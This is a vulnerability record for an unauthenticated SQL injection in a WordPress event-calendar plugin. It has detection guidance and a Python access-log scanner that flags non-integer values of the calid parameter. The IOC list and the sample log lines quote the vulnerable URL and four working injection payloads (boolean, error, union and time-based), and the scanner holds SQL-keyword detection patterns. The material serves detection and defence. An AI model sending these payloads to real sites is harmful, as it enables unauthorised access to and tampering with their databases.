CVE-2014-8586
published 2014-11-04

Priority: P2 (64, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 40.09% (98.5th percentile)
SQL injection vulnerability in the CP Multi View Event Calendar plugin 1.01 for WordPress allows remote attackers to execute arbitrary SQL commands via the calid parameter.

Affected (1 range)

Vendor | Product | Version range | Fixed in
cp_multi_view_event_calendar_project | cp_multi_view_event_calendar | | 

Detection & IOCs (extracted from sources)

URL: /?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1
Command: calid=1 RLIKE (SELECT (CASE WHEN (9095=9095) THEN 1 ELSE 0x28 END))
Command: calid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Command: calid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Command: calid=1 AND 8168=BENCHMARK(5000000,MD5(0x4a4a6d41))
  • Monitor GET requests targeting the WordPress CP Multi-View Event Calendar plugin endpoint with parameters cpmvc_do_action=mvparse, f=datafeed, method=list, and a suspicious calid parameter value (e.g., containing SQL keywords such as RLIKE, UNION, SELECT, BENCHMARK, AND/OR).
  • Detect boolean-based blind SQLi attempts via RLIKE with CASE/WHEN constructs in the calid GET parameter.
  • Detect error-based SQLi attempts using INFORMATION_SCHEMA.CHARACTER_SETS with FLOOR(RAND()) GROUP BY in the calid GET parameter.
  • Detect UNION-based SQLi with 14 NULL columns in the calid GET parameter; the UNION query uses a 14-column schema specific to this plugin's datafeed query.
  • Detect time-based blind SQLi via BENCHMARK(5000000,MD5(...)) in the calid GET parameter; heavy query causing measurable response delay.
  • A Metasploit auxiliary scanner module exists for this vulnerability targeting unauthenticated SQL injection in CP Multi-View Calendar; watch for automated scanning patterns against the datafeed endpoint.
  • The vulnerability is unauthenticated: no WordPress login is required to exploit it, meaning perimeter WAF rules on the datafeed endpoint are the primary preventive control.
  • The calid parameter is entirely unsanitized; any integer-type allowlist enforcement on this parameter at the WAF/application layer will block all known attack vectors.
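As an added example that is not part of this CVE record, the following Python applies the detection bullets above to web-server access-log lines: it identifies the plugin's datafeed endpoint by its marker parameters, enforces the integer allowlist on calid, and labels any non-integer value with the SQLi technique it matches. The log lines, timestamps and IP addresses are constructed; the two payloads are the ones quoted in the IOC list.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters that identify the plugin's datafeed endpoint (from the IOC list above).
DATAFEED_MARKERS = {"cpmvc_do_action": "mvparse", "f": "datafeed", "method": "list"}

# SQL constructs named in the detection bullets, most specific first so that a
# BENCHMARK or INFORMATION_SCHEMA payload is not mislabelled because it also contains "AND".
TECHNIQUES = [
    ("time-based blind", re.compile(r"\bBENCHMARK\s*\(", re.I)),
    ("error-based", re.compile(r"INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND", re.I)),
    ("union-based", re.compile(r"\bUNION\b", re.I)),
    ("boolean-based blind", re.compile(r"\bRLIKE\b|\bAND\b|\bOR\b", re.I)),
]

# Request line inside an Apache/nginx combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not from the page): one benign datafeed call,
# two injection attempts using payloads quoted above, and one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Nov/2014:10:00:01 +0000] "GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Nov/2014:10:00:02 +0000] "GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20(9095=9095)%20THEN%201%20ELSE%200x28%20END)) HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Nov/2014:10:00:03 +0000] "GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1%20AND%208168=BENCHMARK(5000000,MD5(0x4a4a6d41)) HTTP/1.1" 200 512',
    '198.51.100.7 - - [04/Nov/2014:10:00:04 +0000] "GET /?p=12 HTTP/1.1" 200 2048',
]

def classify_request(target):
    """Return None for a request that needs no attention, otherwise a
    (technique, calid) tuple for a datafeed call whose calid is not an integer."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if any(query.get(k, [None])[0] != v for k, v in DATAFEED_MARKERS.items()):
        return None                       # not the vulnerable endpoint
    calid = query.get("calid", [""])[0]   # parse_qs has already percent-decoded it
    if re.fullmatch(r"\d+", calid):
        return None                       # integer allowlist: every known vector fails it
    for label, pattern in TECHNIQUES:
        if pattern.search(calid):
            return (label, calid)
    return ("non-integer calid", calid)   # unknown payload, still worth an alert

def scan_access_log(lines):
    """Return (technique, calid) for every suspicious datafeed request in the log."""
    targets = (m.group("target") for m in map(REQUEST.search, lines) if m)
    return [verdict for verdict in map(classify_request, targets) if verdict]
```

The same allowlist check (`re.fullmatch(r"\d+", calid)`) is what a WAF or application-layer rule on this parameter would enforce; the technique labels only add context for triage.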